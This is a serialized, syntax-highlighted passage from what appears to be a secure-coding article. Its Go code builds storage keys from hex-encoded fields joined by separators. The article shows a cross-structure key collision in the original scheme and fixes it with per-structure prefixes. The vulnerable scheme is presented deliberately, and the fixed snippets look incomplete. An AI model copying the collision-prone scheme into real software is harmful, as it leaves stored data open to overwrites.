PositionMapKey",{"type":24,"tag":301,"props":93064,"children":93065},{"style":359},[93066],{"type":30,"value":1707},{"type":24,"tag":301,"props":93068,"children":93069},{"class":303,"line":439},[93070,93074,93078],{"type":24,"tag":301,"props":93071,"children":93072},{"style":369},[93073],{"type":30,"value":91950},{"type":24,"tag":301,"props":93075,"children":93076},{"style":10246},[93077],{"type":30,"value":83134},{"type":24,"tag":301,"props":93079,"children":93080},{"style":359},[93081],{"type":30,"value":1729},{"type":24,"tag":301,"props":93083,"children":93084},{"class":303,"line":447},[93085,93089,93093,93097,93101,93105],{"type":24,"tag":301,"props":93086,"children":93087},{"style":369},[93088],{"type":30,"value":91962},{"type":24,"tag":301,"props":93090,"children":93091},{"style":359},[93092],{"type":30,"value":377},{"type":24,"tag":301,"props":93094,"children":93095},{"style":369},[93096],{"type":30,"value":92443},{"type":24,"tag":301,"props":93098,"children":93099},{"style":359},[93100],{"type":30,"value":82940},{"type":24,"tag":301,"props":93102,"children":93103},{"style":10246},[93104],{"type":30,"value":91469},{"type":24,"tag":301,"props":93106,"children":93107},{"style":359},[93108],{"type":30,"value":1729},{"type":24,"tag":301,"props":93110,"children":93111},{"class":303,"line":476},[93112,93116,93120,93124,93128],{"type":24,"tag":301,"props":93113,"children":93114},{"style":359},[93115],{"type":30,"value":83095},{"type":24,"tag":301,"props":93117,"children":93118},{"style":369},[93119],{"type":30,"value":78868},{"type":24,"tag":301,"props":93121,"children":93122},{"style":359},[93123],{"type":30,"value":82940},{"type":24,"tag":301,"props":93125,"children":93126},{"style":10246},[93127],{"type":30,"value":91469},{"type":24,"tag":301,"props":93129,"children":93130},{"style":359},[93131],{"type":30,"value":398},{"type":24,"tag":301,"props":93133,"children":93134},{"class":303,"line":495},[93135,93139,93143,93147],{"type":24,"tag":301,"props":93136,"children":93137},{"style":369},[93138],{"type":30,"value":92564},{"type":24,"tag":301,"props":93140,"children":93141},{"style":385},[93142],{"type":30,"value":83129},{"type":24,"tag":301,"props":93144,"children":93145},{"style":314},[93146],{"type":30,"value":92267},{"type":24,"tag":301,"props":93148,"children":93149},{"style":359},[93150],{"type":30,"value":1707},{"type":24,"tag":301,"props":93152,"children":93153},{"class":303,"line":504},[93154,93159,93163],{"type":24,"tag":301,"props":93155,"children":93156},{"style":359},[93157],{"type":30,"value":93158}," []",{"type":24,"tag":301,"props":93160,"children":93161},{"style":10246},[93162],{"type":30,"value":91469},{"type":24,"tag":301,"props":93164,"children":93165},{"style":359},[93166],{"type":30,"value":1729},{"type":24,"tag":301,"props":93168,"children":93169},{"class":303,"line":512},[93170,93175,93179,93183,93187,93191,93195,93199],{"type":24,"tag":301,"props":93171,"children":93172},{"style":369},[93173],{"type":30,"value":93174}," hex",{"type":24,"tag":301,"props":93176,"children":93177},{"style":359},[93178],{"type":30,"value":206},{"type":24,"tag":301,"props":93180,"children":93181},{"style":314},[93182],{"type":30,"value":92304},{"type":24,"tag":301,"props":93184,"children":93185},{"style":359},[93186],{"type":30,"value":362},{"type":24,"tag":301,"props":93188,"children":93189},{"style":314},[93190],{"type":30,"value":6156},{"type":24,"tag":301,"props":93192,"children":93193},{"style":359},[93194],{"type":30,"value":362},{"type":24,"tag":301,"props":93196,"children":93197},{"style":369},[93198],{"type":30,"value":92174},{"type":24,"tag":301,"props":93200,"children":93201},{"style":359},[93202],{"type":30,"value":92325},{"type":24,"tag":301,"props":93204,"children":93205},{"class":303,"line":592},[93206],{"type":24,"tag":301,"props":93207,"children":93208},{"style":359},[93209],{"type":30,"value":30677},{"type":24,"tag":301,"props":93211,"children":93212},{"class":303,"line":619},[93213,93217,93221,93225,93229,93233,93237,93241],{"type":24,"tag":301,"props":93214,"children":93215},{"style":369},[93216],{"type":30,"value":92295},{"type":24,"tag":301,"props":93218,"children":93219},{"style":359},[93220],{"type":30,"value":206},{"type":24,"tag":301,"props":93222,"children":93223},{"style":314},[93224],{"type":30,"value":92349},{"type":24,"tag":301,"props":93226,"children":93227},{"style":359},[93228],{"type":30,"value":362},{"type":24,"tag":301,"props":93230,"children":93231},{"style":369},[93232],{"type":30,"value":92258},{"type":24,"tag":301,"props":93234,"children":93235},{"style":359},[93236],{"type":30,"value":377},{"type":24,"tag":301,"props":93238,"children":93239},{"style":369},[93240],{"type":30,"value":92174},{"type":24,"tag":301,"props":93242,"children":93243},{"style":359},[93244],{"type":30,"value":791},{"type":24,"tag":301,"props":93246,"children":93247},{"class":303,"line":635},[93248],{"type":24,"tag":301,"props":93249,"children":93250},{"emptyLinePlaceholder":16},[93251],{"type":30,"value":341},{"type":24,"tag":301,"props":93253,"children":93254},{"class":303,"line":643},[93255,93260,93264,93268],{"type":24,"tag":301,"props":93256,"children":93257},{"style":369},[93258],{"type":30,"value":93259}," positionNameEncoded",{"type":24,"tag":301,"props":93261,"children":93262},{"style":385},[93263],{"type":30,"value":83129},{"type":24,"tag":301,"props":93265,"children":93266},{"style":314},[93267],{"type":30,"value":92267},{"type":24,"tag":301,"props":93269,"children":93270},{"style":359},[93271],{"type":30,"value":1707},{"type":24,"tag":301,"props":93273,"children":93274},{"class":303,"line":652},[93275,93279,93283],{"type":24,"tag":301,"props":93276,"children":93277},{"style":359},[93278],{"type":30,"value":93158},{"type":24,"tag":301,"props":93280,"children":93281},{"style":10246},[93282],{"type":30,"value":91469},{"type":24,"tag":301,"props":93284,"children":93285},{"style":359},[93286],{"type":30,"value":1729},{"type":24,"tag":301,"props":93288,"children":93289},{"class":303,"line":666},[93290,93294,93298,93302,93306,93310,93314,93318],{"type":24,"tag":301,"props":93291,"children":93292},{"style":369},[93293],{"type":30,"value":93174},{"type":24,"tag":301,"props":93295,"children":93296},{"style":359},[93297],{"type":30,"value":206},{"type":24,"tag":301,"props":93299,"children":93300},{"style":314},[93301],{"type":30,"value":92304},{"type":24,"tag":301,"props":93303,"children":93304},{"style":359},[93305],{"type":30,"value":362},{"type":24,"tag":301,"props":93307,"children":93308},{"style":314},[93309],{"type":30,"value":6156},{"type":24,"tag":301,"props":93311,"children":93312},{"style":359},[93313],{"type":30,"value":362},{"type":24,"tag":301,"props":93315,"children":93316},{"style":369},[93317],{"type":30,"value":92443},{"type":24,"tag":301,"props":93319,"children":93320},{"style":359},[93321],{"type":30,"value":92325},{"type":24,"tag":301,"props":93323,"children":93324},{"class":303,"line":674},[93325],{"type":24,"tag":301,"props":93326,"children":93327},{"style":359},[93328],{"type":30,"value":30677},{"type":24,"tag":301,"props":93330,"children":93331},{"class":303,"line":692},[93332,93336,93340,93344,93348,93352,93356,93360],{"type":24,"tag":301,"props":93333,"children":93334},{"style":369},[93335],{"type":30,"value":92295},{"type":24,"tag":301,"props":93337,"children":93338},{"style":359},[93339],{"type":30,"value":206},{"type":24,"tag":301,"props":93341,"children":93342},{"style":314},[93343],{"type":30,"value":92349},{"type":24,"tag":301,"props":93345,"children":93346},{"style":359},[93347],{"type":30,"value":362},{"type":24,"tag":301,"props":93349,"children":93350},{"style":369},[93351],{"type":30,"value":92384},{"type":24,"tag":301,"props":93353,"children":93354},{"style":359},[93355],{"type":30,"value":377},{"type":24,"tag":301,"props":93357,"children":93358},{"style":369},[93359],{"type":30,"value":92443},{"type":24,"tag":301,"props":93361,"children":93362},{"style":359},[93363],{"type":30,"value":791},{"type":24,"tag":301,"props":93365,"children":93366},{"class":303,"line":3631},[93367],{"type":24,"tag":301,"props":93368,"children":93369},{"emptyLinePlaceholder":16},[93370],{"type":30,"value":341},{"type":24,"tag":301,"props":93372,"children":93373},{"class":303,"line":3639},[93374,93379,93383,93387,93391,93395],{"type":24,"tag":301,"props":93375,"children":93376},{"style":369},[93377],{"type":30,"value":93378}," key",{"type":24,"tag":301,"props":93380,"children":93381},{"style":385},[93382],{"type":30,"value":83129},{"type":24,"tag":301,"props":93384,"children":93385},{"style":369},[93386],{"type":30,"value":88939},{"type":24,"tag":301,"props":93388,"children":93389},{"style":359},[93390],{"type":30,"value":206},{"type":24,"tag":301,"props":93392,"children":93393},{"style":314},[93394],{"type":30,"value":91926},{"type":24,"tag":301,"props":93396,"children":93397},{"style":359},[93398],{"type":30,"value":1707},{"type":24,"tag":301,"props":93400,"children":93401},{"class":303,"line":3647},[93402,93407],{"type":24,"tag":301,"props":93403,"children":93404},{"style":329},[93405],{"type":30,"value":93406}," \"%d%s%s%s%s\"",{"type":24,"tag":301,"props":93408,"children":93409},{"style":359},[93410],{"type":30,"value":1729},{"type":24,"tag":301,"props":93412,"children":93413},{"class":303,"line":3685},[93414,93419],{"type":24,"tag":301,"props":93415,"children":93416},{"style":369},[93417],{"type":30,"value":93418}," vaultId",{"type":24,"tag":301,"props":93420,"children":93421},{"style":359},[93422],{"type":30,"value":1729},{"type":24,"tag":301,"props":93424,"children":93425},{"class":303,"line":3713},[93426,93431],{"type":24,"tag":301,"props":93427,"children":93428},{"style":369},[93429],{"type":30,"value":93430}," Seperator",{"type":24,"tag":301,"props":93432,"children":93433},{"style":359},[93434],{"type":30,"value":1729},{"type":24,"tag":301,"props":93436,"children":93437},{"class":303,"line":3721},[93438,93443],{"type":24,"tag":301,"props":93439,"children":93440},{"style":369},[93441],{"type":30,"value":93442}," usernameEncoded",{"type":24,"tag":301,"props":93444,"children":93445},{"style":359},[93446],{"type":30,"value":1729},{"type":24,"tag":301,"props":93448,"children":93449},{"class":303,"line":3751},[93450,93454],{"type":24,"tag":301,"props":93451,"children":93452},{"style":369},[93453],{"type":30,"value":93430},{"type":24,"tag":301,"props":93455,"children":93456},{"style":359},[93457],{"type":30,"value":1729},{"type":24,"tag":301,"props":93459,"children":93460},{"class":303,"line":3782},[93461,93466],{"type":24,"tag":301,"props":93462,"children":93463},{"style":369},[93464],{"type":30,"value":93465}," positionNameEncoded",{"type":24,"tag":301,"props":93467,"children":93468},{"style":359},[93469],{"type":30,"value":1729},{"type":24,"tag":301,"props":93471,"children":93472},{"class":303,"line":3791},[93473],{"type":24,"tag":301,"props":93474,"children":93475},{"style":359},[93476],{"type":30,"value":30677},{"type":24,"tag":301,"props":93478,"children":93479},{"class":303,"line":3819},[93480],{"type":24,"tag":301,"props":93481,"children":93482},{"style":359},[93483],{"type":30,"value":698},{"type":24,"tag":301,"props":93485,"children":93486},{"class":303,"line":4397},[93487],{"type":24,"tag":301,"props":93488,"children":93489},{"emptyLinePlaceholder":16},[93490],{"type":30,"value":341},{"type":24,"tag":301,"props":93492,"children":93493},{"class":303,"line":4405},[93494],{"type":24,"tag":301,"props":93495,"children":93496},{"emptyLinePlaceholder":16},[93497],{"type":30,"value":341},{"type":24,"tag":301,"props":93499,"children":93500},{"class":303,"line":4422},[93501,93505,93510],{"type":24,"tag":301,"props":93502,"children":93503},{"style":348},[93504],{"type":30,"value":83013},{"type":24,"tag":301,"props":93506,"children":93507},{"style":314},[93508],{"type":30,"value":93509}," AddressMapKey",{"type":24,"tag":301,"props":93511,"children":93512},{"style":359},[93513],{"type":30,"value":1707},{"type":24,"tag":301,"props":93515,"children":93516},{"class":303,"line":4438},[93517,93521,93525],{"type":24,"tag":301,"props":93518,"children":93519},{"style":369},[93520],{"type":30,"value":91950},{"type":24,"tag":301,"props":93522,"children":93523},{"style":10246},[93524],{"type":30,"value":83134},{"type":24,"tag":301,"props":93526,"children":93527},{"style":359},[93528],{"type":30,"value":1729},{"type":24,"tag":301,"props":93530,"children":93531},{"class":303,"line":4446},[93532,93536,93540,93545,93549],{"type":24,"tag":301,"props":93533,"children":93534},{"style":369},[93535],{"type":30,"value":91962},{"type":24,"tag":301,"props":93537,"children":93538},{"style":359},[93539],{"type":30,"value":377},{"type":24,"tag":301,"props":93541,"children":93542},{"style":369},[93543],{"type":30,"value":93544},"addressName",{"type":24,"tag":301,"props":93546,"children":93547},{"style":359},[93548],{"type":30,"value":82940},{"type":24,"tag":301,"props":93550,"children":93551},{"style":10246},[93552],{"type":30,"value":90933},{"type":24,"tag":301,"props":93554,"children":93555},{"class":303,"line":4506},[93556,93560,93564,93568,93572],{"type":24,"tag":301,"props":93557,"children":93558},{"style":359},[93559],{"type":30,"value":83095},{"type":24,"tag":301,"props":93561,"children":93562},{"style":369},[93563],{"type":30,"value":78868},{"type":24,"tag":301,"props":93565,"children":93566},{"style":359},[93567],{"type":30,"value":82940},{"type":24,"tag":301,"props":93569,"children":93570},{"style":10246},[93571],{"type":30,"value":91469},{"type":24,"tag":301,"props":93573,"children":93574},{"style":359},[93575],{"type":30,"value":398},{"type":24,"tag":301,"props":93577,"children":93578},{"class":303,"line":4566},[93579,93583,93587,93591],{"type":24,"tag":301,"props":93580,"children":93581},{"style":369},[93582],{"type":30,"value":92564},{"type":24,"tag":301,"props":93584,"children":93585},{"style":385},[93586],{"type":30,"value":83129},{"type":24,"tag":301,"props":93588,"children":93589},{"style":314},[93590],{"type":30,"value":92267},{"type":24,"tag":301,"props":93592,"children":93593},{"style":359},[93594],{"type":30,"value":1707},{"type":24,"tag":301,"props":93596,"children":93597},{"class":303,"line":4574},[93598,93602,93606],{"type":24,"tag":301,"props":93599,"children":93600},{"style":359},[93601],{"type":30,"value":93158},{"type":24,"tag":301,"props":93603,"children":93604},{"style":10246},[93605],{"type":30,"value":91469},{"type":24,"tag":301,"props":93607,"children":93608},{"style":359},[93609],{"type":30,"value":1729},{"type":24,"tag":301,"props":93611,"children":93612},{"class":303,"line":4590},[93613,93617,93621,93625,93629,93633,93637,93641],{"type":24,"tag":301,"props":93614,"children":93615},{"style":369},[93616],{"type":30,"value":93174},{"type":24,"tag":301,"props":93618,"children":93619},{"style":359},[93620],{"type":30,"value":206},{"type":24,"tag":301,"props":93622,"children":93623},{"style":314},[93624],{"type":30,"value":92304},{"type":24,"tag":301,"props":93626,"children":93627},{"style":359},[93628],{"type":30,"value":362},{"type":24,"tag":301,"props":93630,"children":93631},{"style":314},[93632],{"type":30,"value":6156},{"type":24,"tag":301,"props":93634,"children":93635},{"style":359},[93636],{"type":30,"value":362},{"type":24,"tag":301,"props":93638,"children":93639},{"style":369},[93640],{"type":30,"value":92174},{"type":24,"tag":301,"props":93642,"children":93643},{"style":359},[93644],{"type":30,"value":92325},{"type":24,"tag":301,"props":93646,"children":93647},{"class":303,"line":4599},[93648],{"type":24,"tag":301,"props":93649,"children":93650},{"style":359},[93651],{"type":30,"value":30677},{"type":24,"tag":301,"props":93653,"children":93654},{"class":303,"line":4629},[93655,93659,93663,93667,93671,93675,93679,93683],{"type":24,"tag":301,"props":93656,"children":93657},{"style":369},[93658],{"type":30,"value":92295},{"type":24,"tag":301,"props":93660,"children":93661},{"style":359},[93662],{"type":30,"value":206},{"type":24,"tag":301,"props":93664,"children":93665},{"style":314},[93666],{"type":30,"value":92349},{"type":24,"tag":301,"props":93668,"children":93669},{"style":359},[93670],{"type":30,"value":362},{"type":24,"tag":301,"props":93672,"children":93673},{"style":369},[93674],{"type":30,"value":92258},{"type":24,"tag":301,"props":93676,"children":93677},{"style":359},[93678],{"type":30,"value":377},{"type":24,"tag":301,"props":93680,"children":93681},{"style":369},[93682],{"type":30,"value":92174},{"type":24,"tag":301,"props":93684,"children":93685},{"style":359},[93686],{"type":30,"value":791},{"type":24,"tag":301,"props":93688,"children":93689},{"class":303,"line":4659},[93690],{"type":24,"tag":301,"props":93691,"children":93692},{"emptyLinePlaceholder":16},[93693],{"type":30,"value":341},{"type":24,"tag":301,"props":93695,"children":93696},{"class":303,"line":4668},[93697,93702,93706,93710],{"type":24,"tag":301,"props":93698,"children":93699},{"style":369},[93700],{"type":30,"value":93701}," addressNameEncoded",{"type":24,"tag":301,"props":93703,"children":93704},{"style":385},[93705],{"type":30,"value":83129},{"type":24,"tag":301,"props":93707,"children":93708},{"style":314},[93709],{"type":30,"value":92267},{"type":24,"tag":301,"props":93711,"children":93712},{"style":359},[93713],{"type":30,"value":1707},{"type":24,"tag":301,"props":93715,"children":93716},{"class":303,"line":4677},[93717,93721,93725],{"type":24,"tag":301,"props":93718,"children":93719},{"style":359},[93720],{"type":30,"value":93158},{"type":24,"tag":301,"props":93722,"children":93723},{"style":10246},[93724],{"type":30,"value":91469},{"type":24,"tag":301,"props":93726,"children":93727},{"style":359},[93728],{"type":30,"value":1729},{"type":24,"tag":301,"props":93730,"children":93731},{"class":303,"line":4697},[93732,93736,93740,93744,93748,93752,93756,93760],{"type":24,"tag":301,"props":93733,"children":93734},{"style":369},[93735],{"type":30,"value":93174},{"type":24,"tag":301,"props":93737,"children":93738},{"style":359},[93739],{"type":30,"value":206},{"type":24,"tag":301,"props":93741,"children":93742},{"style":314},[93743],{"type":30,"value":92304},{"type":24,"tag":301,"props":93745,"children":93746},{"style":359},[93747],{"type":30,"value":362},{"type":24,"tag":301,"props":93749,"children":93750},{"style":314},[93751],{"type":30,"value":6156},{"type":24,"tag":301,"props":93753,"children":93754},{"style":359},[93755],{"type":30,"value":362},{"type":24,"tag":301,"props":93757,"children":93758},{"style":369},[93759],{"type":30,"value":93544},{"type":24,"tag":301,"props":93761,"children":93762},{"style":359},[93763],{"type":30,"value":92325},{"type":24,"tag":301,"props":93765,"children":93766},{"class":303,"line":4725},[93767],{"type":24,"tag":301,"props":93768,"children":93769},{"style":359},[93770],{"type":30,"value":30677},{"type":24,"tag":301,"props":93772,"children":93773},{"class":303,"line":4733},[93774,93778,93782,93786,93790,93795,93799,93803],{"type":24,"tag":301,"props":93775,"children":93776},{"style":369},[93777],{"type":30,"value":92295},{"type":24,"tag":301,"props":93779,"children":93780},{"style":359},[93781],{"type":30,"value":206},{"type":24,"tag":301,"props":93783,"children":93784},{"style":314},[93785],{"type":30,"value":92349},{"type":24,"tag":301,"props":93787,"children":93788},{"style":359},[93789],{"type":30,"value":362},{"type":24,"tag":301,"props":93791,"children":93792},{"style":369},[93793],{"type":30,"value":93794},"addressNameEncoded",{"type":24,"tag":301,"props":93796,"children":93797},{"style":359},[93798],{"type":30,"value":377},{"type":24,"tag":301,"props":93800,"children":93801},{"style":369},[93802],{"type":30,"value":93544},{"type":24,"tag":301,"props":93804,"children":93805},{"style":359},[93806],{"type":30,"value":791},{"type":24,"tag":301,"props":93808,"children":93809},{"class":303,"line":4741},[93810],{"type":24,"tag":301,"props":93811,"children":93812},{"emptyLinePlaceholder":16},[93813],{"type":30,"value":341},{"type":24,"tag":301,"props":93815,"children":93816},{"class":303,"line":4757},[93817,93821,93825,93829,93833,93837],{"type":24,"tag":301,"props":93818,"children":93819},{"style":369},[93820],{"type":30,"value":93378},{"type":24,"tag":301,"props":93822,"children":93823},{"style":385},[93824],{"type":30,"value":83129},{"type":24,"tag":301,"props":93826,"children":93827},{"style":369},[93828],{"type":30,"value":88939},{"type":24,"tag":301,"props":93830,"children":93831},{"style":359},[93832],{"type":30,"value":206},{"type":24,"tag":301,"props":93834,"children":93835},{"style":314},[93836],{"type":30,"value":91926},{"type":24,"tag":301,"props":93838,"children":93839},{"style":359},[93840],{"type":30,"value":1707},{"type":24,"tag":301,"props":93842,"children":93843},{"class":303,"line":4765},[93844,93848],{"type":24,"tag":301,"props":93845,"children":93846},{"style":329},[93847],{"type":30,"value":93406},{"type":24,"tag":301,"props":93849,"children":93850},{"style":359},[93851],{"type":30,"value":1729},{"type":24,"tag":301,"props":93853,"children":93854},{"class":303,"line":4773},[93855,93859],{"type":24,"tag":301,"props":93856,"children":93857},{"style":369},[93858],{"type":30,"value":93418},{"type":24,"tag":301,"props":93860,"children":93861},{"style":359},[93862],{"type":30,"value":1729},{"type":24,"tag":301,"props":93864,"children":93865},{"class":303,"line":4781},[93866,93870],{"type":24,"tag":301,"props":93867,"children":93868},{"style":369},[93869],{"type":30,"value":93430},{"type":24,"tag":301,"props":93871,"children":93872},{"style":359},[93873],{"type":30,"value":1729},{"type":24,"tag":301,"props":93875,"children":93876},{"class":303,"line":4789},[93877,93881],{"type":24,"tag":301,"props":93878,"children":93879},{"style":369},[93880],{"type":30,"value":93442},{"type":24,"tag":301,"props":93882,"children":93883},{"style":359},[93884],{"type":30,"value":1729},{"type":24,"tag":301,"props":93886,"children":93887},{"class":303,"line":4848},[93888,93892],{"type":24,"tag":301,"props":93889,"children":93890},{"style":369},[93891],{"type":30,"value":93430},{"type":24,"tag":301,"props":93893,"children":93894},{"style":359},[93895],{"type":30,"value":1729},{"type":24,"tag":301,"props":93897,"children":93898},{"class":303,"line":4862},[93899,93904],{"type":24,"tag":301,"props":93900,"children":93901},{"style":369},[93902],{"type":30,"value":93903}," addressNameEncoded",{"type":24,"tag":301,"props":93905,"children":93906},{"style":359},[93907],{"type":30,"value":1729},{"type":24,"tag":301,"props":93909,"children":93910},{"class":303,"line":4871},[93911],{"type":24,"tag":301,"props":93912,"children":93913},{"style":359},[93914],{"type":30,"value":30677},{"type":24,"tag":301,"props":93916,"children":93917},{"class":303,"line":4879},[93918],{"type":24,"tag":301,"props":93919,"children":93920},{"style":359},[93921],{"type":30,"value":698},{"type":24,"tag":32,"props":93923,"children":93924},{},[93925,93927,93932],{"type":30,"value":93926},"Unfortunately, when dealing with more than one storage entry within the same ",{"type":24,"tag":145,"props":93928,"children":93930},{"className":93929},[],[93931],{"type":30,"value":91681},{"type":30,"value":93933},", the previous implementation is not enough to guarantee key uniqueness. While it still effectively prevents key collisions within each individual structure, it does not prevent cross-structure key collisions.",{"type":24,"tag":291,"props":93935,"children":93937},{"code":93936},"vaultId = 1, username = \"a\", positionName = \"b\"\n => PositionMapKey = \"1|a|b\"\n\nvaultId = 1, username = \"a\", addressName = \"b\"\n => AddressMapKey = \"1|a||b\"\n",[93938],{"type":24,"tag":145,"props":93939,"children":93940},{"__ignoreMap":7},[93941],{"type":30,"value":93936},{"type":24,"tag":32,"props":93943,"children":93944},{},[93945],{"type":30,"value":93946},"To prevent this, add a structure-specific prefix to the start of each key to act as a domain separator.",{"type":24,"tag":291,"props":93948,"children":93950},{"code":93949,"language":82877,"meta":7,"className":82878,"style":7},"const (\n Seperator = \"|\"\n PositionMapPrefix = \"\\x01\"\n AddressMapPrefix = \"\\x02\"\n)\n\n\nfunc PositionMapKey(\n vaultId uint64,\n username, positionName []byte,\n) (key []byte) {\n usernameEncoded := make(\n []byte,\n hex.EncodedLen(len(username)),\n )\n hex.Encode(usernameEncoded, username)\n\n positionNameEncoded := make(\n []byte,\n hex.EncodedLen(len(positionName)),\n )\n hex.Encode(positionNameEncoded, positionName)\n\n key := fmt.Sprintf(\n \"%s%d%s%s%s%s\",\n PositionMapPrefix,\n vaultId,\n Seperator,\n usernameEncoded,\n Seperator,\n positionNameEncoded,\n )\n}\n\n\nfunc AddressMapKey(\n vaultId uint64,\n username, addressName []byte,\n) (key []byte) {\n usernameEncoded := make(\n []byte,\n hex.EncodedLen(len(username)),\n )\n hex.Encode(usernameEncoded, username)\n\n addressNameEncoded := make(\n []byte,\n hex.EncodedLen(len(addressName)),\n )\n hex.Encode(addressNameEncoded, addressName)\n\n key := fmt.Sprintf(\n \"%s%d%s%s%s%s\",\n AddressMapPrefix,\n vaultId,\n Seperator,\n usernameEncoded,\n Seperator,\n addressNameEncoded,\n )\n}\n",[93951],{"type":24,"tag":145,"props":93952,"children":93953},{"__ignoreMap":7},[93954,93965,93980,94007,94032,94039,94046,94053,94068,94083,94110,94133,94152,94167,94202,94209,94244,94251,94270,94285,94320,94327,94362,94369,94396,94408,94420,94431,94442,94453,94464,94475,94482,94489,94496,94503,94518,94533,94560,94583,94602,94617,94652,94659,94694,94701,94720,94735,94770,94777,94812,94819,94846,94857,94869,94880,94891,94902,94913,94924,94932],{"type":24,"tag":301,"props":93955,"children":93956},{"class":303,"line":304},[93957,93961],{"type":24,"tag":301,"props":93958,"children":93959},{"style":348},[93960],{"type":30,"value":16460},{"type":24,"tag":301,"props":93962,"children":93963},{"style":359},[93964],{"type":30,"value":85278},{"type":24,"tag":301,"props":93966,"children":93967},{"class":303,"line":320},[93968,93972,93976],{"type":24,"tag":301,"props":93969,"children":93970},{"style":369},[93971],{"type":30,"value":92034},{"type":24,"tag":301,"props":93973,"children":93974},{"style":385},[93975],{"type":30,"value":2537},{"type":24,"tag":301,"props":93977,"children":93978},{"style":329},[93979],{"type":30,"value":92043},{"type":24,"tag":301,"props":93981,"children":93982},{"class":303,"line":335},[93983,93988,93992,93997,94002],{"type":24,"tag":301,"props":93984,"children":93985},{"style":369},[93986],{"type":30,"value":93987}," PositionMapPrefix",{"type":24,"tag":301,"props":93989,"children":93990},{"style":385},[93991],{"type":30,"value":2537},{"type":24,"tag":301,"props":93993,"children":93994},{"style":329},[93995],{"type":30,"value":93996}," \"",{"type":24,"tag":301,"props":93998,"children":93999},{"style":9400},[94000],{"type":30,"value":94001},"\\x01",{"type":24,"tag":301,"props":94003,"children":94004},{"style":329},[94005],{"type":30,"value":94006},"\"\n",{"type":24,"tag":301,"props":94008,"children":94009},{"class":303,"line":344},[94010,94015,94019,94023,94028],{"type":24,"tag":301,"props":94011,"children":94012},{"style":369},[94013],{"type":30,"value":94014}," AddressMapPrefix",{"type":24,"tag":301,"props":94016,"children":94017},{"style":385},[94018],{"type":30,"value":2537},{"type":24,"tag":301,"props":94020,"children":94021},{"style":329},[94022],{"type":30,"value":93996},{"type":24,"tag":301,"props":94024,"children":94025},{"style":9400},[94026],{"type":30,"value":94027},"\\x02",{"type":24,"tag":301,"props":94029,"children":94030},{"style":329},[94031],{"type":30,"value":94006},{"type":24,"tag":301,"props":94033,"children":94034},{"class":303,"line":401},[94035],{"type":24,"tag":301,"props":94036,"children":94037},{"style":359},[94038],{"type":30,"value":791},{"type":24,"tag":301,"props":94040,"children":94041},{"class":303,"line":415},[94042],{"type":24,"tag":301,"props":94043,"children":94044},{"emptyLinePlaceholder":16},[94045],{"type":30,"value":341},{"type":24,"tag":301,"props":94047,"children":94048},{"class":303,"line":439},[94049],{"type":24,"tag":301,"props":94050,"children":94051},{"emptyLinePlaceholder":16},[94052],{"type":30,"value":341},{"type":24,"tag":301,"props":94054,"children":94055},{"class":303,"line":447},[94056,94060,94064],{"type":24,"tag":301,"props":94057,"children":94058},{"style":348},[94059],{"type":30,"value":83013},{"type":24,"tag":301,"props":94061,"children":94062},{"style":314},[94063],{"type":30,"value":93062},{"type":24,"tag":301,"props":94065,"children":94066},{"style":359},[94067],{"type":30,"value":1707},{"type":24,"tag":301,"props":94069,"children":94070},{"class":303,"line":476},[94071,94075,94079],{"type":24,"tag":301,"props":94072,"children":94073},{"style":369},[94074],{"type":30,"value":91950},{"type":24,"tag":301,"props":94076,"children":94077},{"style":10246},[94078],{"type":30,"value":83134},{"type":24,"tag":301,"props":94080,"children":94081},{"style":359},[94082],{"type":30,"value":1729},{"type":24,"tag":301,"props":94084,"children":94085},{"class":303,"line":495},[94086,94090,94094,94098,94102,94106],{"type":24,"tag":301,"props":94087,"children":94088},{"style":369},[94089],{"type":30,"value":91962},{"type":24,"tag":301,"props":94091,"children":94092},{"style":359},[94093],{"type":30,"value":377},{"type":24,"tag":301,"props":94095,"children":94096},{"style":369},[94097],{"type":30,"value":92443},{"type":24,"tag":301,"props":94099,"children":94100},{"style":359},[94101],{"type":30,"value":82940},{"type":24,"tag":301,"props":94103,"children":94104},{"style":10246},[94105],{"type":30,"value":91469},{"type":24,"tag":301,"props":94107,"children":94108},{"style":359},[94109],{"type":30,"value":1729},{"type":24,"tag":301,"props":94111,"children":94112},{"class":303,"line":504},[94113,94117,94121,94125,94129],{"type":24,"tag":301,"props":94114,"children":94115},{"style":359},[94116],{"type":30,"value":83095},{"type":24,"tag":301,"props":94118,"children":94119},{"style":369},[94120],{"type":30,"value":78868},{"type":24,"tag":301,"props":94122,"children":94123},{"style":359},[94124],{"type":30,"value":82940},{"type":24,"tag":301,"props":94126,"children":94127},{"style":10246},[94128],{"type":30,"value":91469},{"type":24,"tag":301,"props":94130,"children":94131},{"style":359},[94132],{"type":30,"value":398},{"type":24,"tag":301,"props":94134,"children":94135},{"class":303,"line":512},[94136,94140,94144,94148],{"type":24,"tag":301,"props":94137,"children":94138},{"style":369},[94139],{"type":30,"value":92564},{"type":24,"tag":301,"props":94141,"children":94142},{"style":385},[94143],{"type":30,"value":83129},{"type":24,"tag":301,"props":94145,"children":94146},{"style":314},[94147],{"type":30,"value":92267},{"type":24,"tag":301,"props":94149,"children":94150},{"style":359},[94151],{"type":30,"value":1707},{"type":24,"tag":301,"props":94153,"children":94154},{"class":303,"line":592},[94155,94159,94163],{"type":24,"tag":301,"props":94156,"children":94157},{"style":359},[94158],{"type":30,"value":93158},{"type":24,"tag":301,"props":94160,"children":94161},{"style":10246},[94162],{"type":30,"value":91469},{"type":24,"tag":301,"props":94164,"children":94165},{"style":359},[94166],{"type":30,"value":1729},{"type":24,"tag":301,"props":94168,"children":94169},{"class":303,"line":619},[94170,94174,94178,94182,94186,94190,94194,94198],{"type":24,"tag":301,"props":94171,"children":94172},{"style":369},[94173],{"type":30,"value":93174},{"type":24,"tag":301,"props":94175,"children":94176},{"style":359},[94177],{"type":30,"value":206},{"type":24,"tag":301,"props":94179,"children":94180},{"style":314},[94181],{"type":30,"value":92304},{"type":24,"tag":301,"props":94183,"children":94184},{"style":359},[94185],{"type":30,"value":362},{"type":24,"tag":301,"props":94187,"children":94188},{"style":314},[94189],{"type":30,"value":6156},{"type":24,"tag":301,"props":94191,"children":94192},{"style":359},[94193],{"type":30,"value":362},{"type":24,"tag":301,"props":94195,"children":94196},{"style":369},[94197],{"type":30,"value":92174},{"type":24,"tag":301,"props":94199,"children":94200},{"style":359},[94201],{"type":30,"value":92325},{"type":24,"tag":301,"props":94203,"children":94204},{"class":303,"line":635},[94205],{"type":24,"tag":301,"props":94206,"children":94207},{"style":359},[94208],{"type":30,"value":30677},{"type":24,"tag":301,"props":94210,"children":94211},{"class":303,"line":643},[94212,94216,94220,94224,94228,94232,94236,94240],{"type":24,"tag":301,"props":94213,"children":94214},{"